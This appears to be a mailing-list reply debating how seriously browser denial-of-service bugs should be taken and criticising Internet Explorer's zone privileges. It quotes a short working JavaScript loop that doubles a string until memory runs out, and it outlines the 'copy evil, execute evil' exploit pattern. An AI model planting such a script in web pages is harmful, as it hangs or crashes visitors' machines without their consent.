From: visitbipin at yahoo.com (bipin gautam)
Subject: Browser bugs [DoS] ... where will you draw a line?

--- Heikki Toivonen <hjtoi@...cast.net> wrote:
> bipin gautam wrote:
> > Browser bugs [DoS] ... where will you draw a line?
>
> Browser DoS bugs don't get high priority because
> they are so easy to
> avoid. For example, if you go to a website that
> crashes your browser,
> hangs it, or launches 10,000 popup windows you can
> simply kill the
> browser and never go to that site again. Annoying,
> yes, but that's about it.
>
> DoS bugs that cause permanent damage are treated
> differently, of course.
> For example, I could imagine a bug that would
> corrupt some critical file
> and the browser would no longer start. Those bugs
> would be fixed fast,
> like traditional security vulnerabilities.
>
> --
>    Heikki Toivonen
<snip>
------------
<script language="JavaScript"><!--
var szhUNT="...its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
-------------
</snip>

the soution here isn't to upgrade everytime..... try
running this script in a older version of windows and
in a minute you will flush your RAM, the only solution
to run your PC in normal speed would be to RESTART!

the point here is... users should* be in COMPLETE
control of what they view in their browser.

 Zone alarm pro does have a good feature of handling
scripts and other fancy stuffs on the website basis
put in 'a click and go' manner. Sometimes even a
full-screen pop Up is a pain when you find the only
way of closing it is to kill the process tree!

WHY should a web-content laded in "INTERNET ZONE"  be
ever given the privilege to access/use local drive
paths??? It's really stupid to discover many IE bugs
use this basic principle,
--------------
copy evil in c:\xyz

execute evil
--------------

This wouldn't have happened if the content viewed in
"internet zone" was never given the privilege to
access  any of the registry keys, local path's, [c:\?]
 etc... at all* or use a different way to access them!
Many IE exploits would have never succeed. It's still
strange to see executables being executed from
"Temporary internet files" [folder]
.......well, that's where software 'execution
restriction' policy of windows kicks in, right?

After all, we are loading plain scripts in our
browser. ONLY when the dazzling features of OS is
completely restricted to be used/access via web
browsers exploits won't slow to pour down.

./hUNT3R